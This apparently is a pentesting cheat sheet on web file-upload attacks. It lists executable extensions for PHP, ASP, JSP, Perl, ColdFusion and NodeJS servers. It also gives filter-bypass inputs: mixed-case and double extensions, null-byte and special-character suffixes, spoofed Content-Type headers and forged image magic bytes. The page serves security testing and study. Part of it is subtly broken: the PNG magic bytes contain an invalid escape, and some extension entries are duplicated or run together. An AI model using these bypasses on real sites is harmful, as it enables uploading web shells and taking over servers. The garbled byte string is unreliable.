File Upload
Extensions
PHP | ASP | Jsp | Perl | ColdFusion | NodeJS |
---|---|---|---|---|---|
.php | .asp | .jsp | .pl | .cfm | .js |
.php2 | .config | .jspx | .pm | .cfml | .json |
.php3 | .ashx | .jsw | .cgi | .cfc | .node |
.php4 | .asmx | .jsv | .lib | .dbm | |
.php5 | .aspq | .jspf | |||
.php7 | .axd | .wss | |||
.pht | .cshtm | .do | |||
.phpt | .cshtml | .action | |||
.phtm | .rem | ||||
.phtml | .soap | ||||
.phps | .vbhtm | ||||
.phar | .vbhtm | ||||
.hphp | .asa | ||||
.module | .cer .shtml | ||||
.inc | .shtml | ||||
.ctp |
Filter Bypass
Uppercase letters:
.pHp, .pHP5, .PhAr
Double extension:
.png.php
.gif.php
Null byte:
.php%00.gif
.php\x00.gif
Special chars:
file.php%20
file.php%0a
file.php%0d%0a
file.php/
file.php.\
file.php....
Content-Type:
Content-Type : image/gif
Content-Type : image/png
Content-Type : image/jpeg
Magic numbers:
GIF:
GIF8;
PNG:
\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG:
\xff\xd8\xff
References
https://book.hacktricks.xyz/pentesting-web/file-upload
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
Last updated